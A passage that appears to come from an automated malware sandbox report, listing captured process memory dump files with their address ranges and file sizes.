                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    112KB

                                                                                                                                                                                                                                                  • memory/7240-8355-0x0000020166770000-0x000002016677A000-memory.dmp

                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    40KB

                                                                                                                                                                                                                                                  • memory/7240-8353-0x0000020166750000-0x000002016675A000-memory.dmp

                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    40KB

                                                                                                                                                                                                                                                  • memory/7240-8354-0x0000020166760000-0x0000020166768000-memory.dmp

                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    32KB

                                                                                                                                                                                                                                                  • memory/7552-7800-0x0000000005D10000-0x0000000006064000-memory.dmp

                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    3.3MB

                                                                                                                                                                                                                                                  • memory/7552-7801-0x0000000006730000-0x000000000677C000-memory.dmp

                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    304KB

                                                                                                                                                                                                                                                  • memory/7684-9083-0x00007FF781650000-0x00007FF78214F000-memory.dmp

                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    11.0MB

                                                                                                                                                                                                                                                  • memory/7684-9008-0x00007FF781650000-0x00007FF78214F000-memory.dmp

                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    11.0MB

                                                                                                                                                                                                                                                  • memory/8060-8711-0x000002635F700000-0x000002635F71C000-memory.dmp

                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    112KB

                                                                                                                                                                                                                                                  • memory/8060-8724-0x000002635F970000-0x000002635F976000-memory.dmp

                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    24KB

                                                                                                                                                                                                                                                  • memory/8060-8712-0x000002635F720000-0x000002635F7D5000-memory.dmp

                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    724KB

                                                                                                                                                                                                                                                  • memory/8060-8713-0x000002635F7E0000-0x000002635F7EA000-memory.dmp

                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    40KB

                                                                                                                                                                                                                                                  • memory/8060-8723-0x000002635F990000-0x000002635F9AA000-memory.dmp

                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    104KB

                                                                                                                                                                                                                                                  • memory/8328-8176-0x000000006FE30000-0x000000006FE7C000-memory.dmp

                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    304KB

                                                                                                                                                                                                                                                  • memory/8328-8201-0x0000000007E10000-0x0000000007E18000-memory.dmp

                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    32KB

                                                                                                                                                                                                                                                  • memory/8328-8200-0x0000000007E20000-0x0000000007E3A000-memory.dmp

                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    104KB

                                                                                                                                                                                                                                                  • memory/8328-8198-0x0000000007DE0000-0x0000000007DF4000-memory.dmp

                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    80KB

                                                                                                                                                                                                                                                  • memory/8328-8197-0x0000000007DD0000-0x0000000007DDE000-memory.dmp

                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    56KB

                                                                                                                                                                                                                                                  • memory/8328-8175-0x0000000007A40000-0x0000000007A72000-memory.dmp

                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    200KB

                                                                                                                                                                                                                                                  • memory/8328-8189-0x0000000007DA0000-0x0000000007DB1000-memory.dmp

                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    68KB

                                                                                                                                                                                                                                                  • memory/8328-8188-0x0000000007C10000-0x0000000007C1A000-memory.dmp

                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    40KB

                                                                                                                                                                                                                                                  • memory/8328-8187-0x0000000007A80000-0x0000000007B23000-memory.dmp

                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    652KB

                                                                                                                                                                                                                                                  • memory/8328-8186-0x0000000007A20000-0x0000000007A3E000-memory.dmp

                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    120KB

                                                                                                                                                                                                                                                  • memory/8596-7745-0x0000000000400000-0x000000000042C000-memory.dmp

                                                                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                                                                    176KB